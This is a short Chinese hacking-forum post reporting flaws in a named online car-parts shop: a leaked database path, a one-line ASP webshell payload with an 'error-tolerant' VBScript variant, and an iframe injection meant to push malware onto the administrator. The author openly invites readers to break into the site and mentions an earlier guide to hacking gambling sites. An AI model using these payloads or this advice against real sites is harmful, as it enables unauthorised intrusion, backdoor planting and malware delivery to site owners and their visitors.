大家好，我是皮皮，今天ARP无意间得到一个
http://shop.chinacars.com的用户，登陆进去后发现两次漏洞，直接进入主题，很明显的爆库漏洞，

大家马上想到一句话，。。。我们来测试一下

我估计是过滤了%或>等特殊字符，到网上找了个容错的

我也不知道什么原因，也没空深入研究，再来看挂马漏洞

很明显吧，这样管理员看你提交的问题后就可以给他下马了，还有个办法，就在在这里提交小马

我的意思是大家把里面的%等等符号转义一下或许可以挂上。。。我们看他的排名709是个大站吧，我没时间入侵，送给大家去搞了，

还有昨天我发布的一个教程就是入侵赌博站并破解其软件怎么没发上来？有什么不合适吗？

算了，无所谓了，呵呵，，就到这

Microsoft VBScript 运行时错误 错误 '800a0005'

无效的过程调用或参数: 'right'

F:\SHOP.CHINACARS.COM\ORDER\../mimi2.asp，行 212

F:\SHOP.CHINACARS.COM\ORDER\../mimi2.asp  数据库

<%execute request("value")%>  一句话，

<Scriptlanguage=VBS cript runat=server>execute request("value")</Script> 容错格式

<iframe src=http://www.baidu.com/ width=100 height=100></iframe>  挂马